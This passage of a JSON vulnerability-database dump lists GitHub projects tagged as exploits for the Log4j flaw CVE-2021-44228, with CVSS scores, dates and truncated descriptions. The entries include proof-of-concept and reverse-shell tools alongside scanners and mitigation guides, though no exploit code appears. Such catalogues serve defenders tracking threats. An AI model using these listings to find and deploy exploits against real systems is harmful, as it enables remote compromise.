"HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T17:40:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T19:26:23", "id": "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-10T22:05:17", "description": "#CVE-2021-44228\nBackdoor detection for VMware view hori...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T11:27:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-10T13:33:26", "id": "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-23T20:36:52", "description": "# Log4j2 2.14.1 LDAP \uc6d0\uaca9 \ucf54\ub4dc \uc2e4\ud589 \ucde8\uc57d\uc810(CVE-2021-44228) \ud655\uc778\n\n* \ucde8\uc57d\uc810 \uacf5\uc9c0\n ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T04:36:41", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T19:59:25", "id": "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-24T11:07:23", "description": "# Log4JPOC\nPOC for CVE-2021-44228 vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:15:12", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T10:15:11", "id": "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:11", "description": "# Saturn\nA tool to analyze the log files from minecraft to scan ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T19:42:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T08:17:51", "id": "4F757EF2-574B-55C7-A017-51DC8BB28C31", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T11:59:22", "description": "# Log4j_checker.py (CVE-2021-44228)\n![poc_log4j](https://user-im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T18:35:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-27T02:47:53", "id": "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-24T23:51:26", "description": "# CVE-2021-44228 (log4shell) POC\n---------------------\n<h1 align...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T09:26:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-24T23:08:50", "id": "1CCC4512-40AB-5F72-9913-3D894DB4676F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-25T18:14:01", "description": "# log4j-vulnerable-app-cve-2021-44228-terraform\nA Terraform to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T13:56:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-25T17:42:11", "id": "14482532-2406-58DF-89FF-30B085015257", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:56", "description": "# log4stdin — log4shell injection for anything with stdout...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T16:39:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-02T16:13:36", "id": "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T21:14:43", "description": "# PS-CVE-2021-44228\nStatic detection of vulnerable log4j librair...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T12:46:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T08:30:13", "id": "75180259-16B4-5B60-9913-BFC9A306560A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:20", "description": "## Details and Mitigation Strategy for log4j2 RCE Vulnerability\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T20:39:56", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T16:21:03", "id": "5233D0F2-69A2-5220-8016-07D66C226F01", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-30T18:15:10", "description": "# log4j-scanner\n\nCheck CVE-2021-44228 vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T07:59:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-30T16:35:24", "id": "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:08:39", "description": "# Get-log4j-Windows-local.ps1\n \n Identify all log4j components ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T07:35:01", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T18:50:17", "id": "7865A97A-CD10-5E45-9429-CF5F72A6952B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:30", "description": "# Log4j-CVE-2021-44228\nLog4j Remote Cod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:40:13", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T10:29:05", "id": "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T09:27:27", "description": "# Log4j2-CVE-2021-44228-revshell\n\n \n## Usage\n\n For reverse...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T05:24:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T07:01:14", "id": "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T23:07:15", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T20:02:09", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T20:05:17", "id": "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-18T23:41:33", "description": "# Log4Shell in action\n\nThis project aims to demonstrate how the ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T10:57:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-18T19:42:45", "id": "4DBC05D1-8178-5715-953D-61ECC89104F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:14:25", "description": "# anti-jndi\nFun things against the abuse of the recent CVE-2021-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:23:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T22:21:20", "id": "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-28T11:08:10", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T17:06:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T08:39:10", "id": "D1E393B9-589D-5A20-8799-0F762FD361DA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T20:09:51", "description": "# CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:14:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 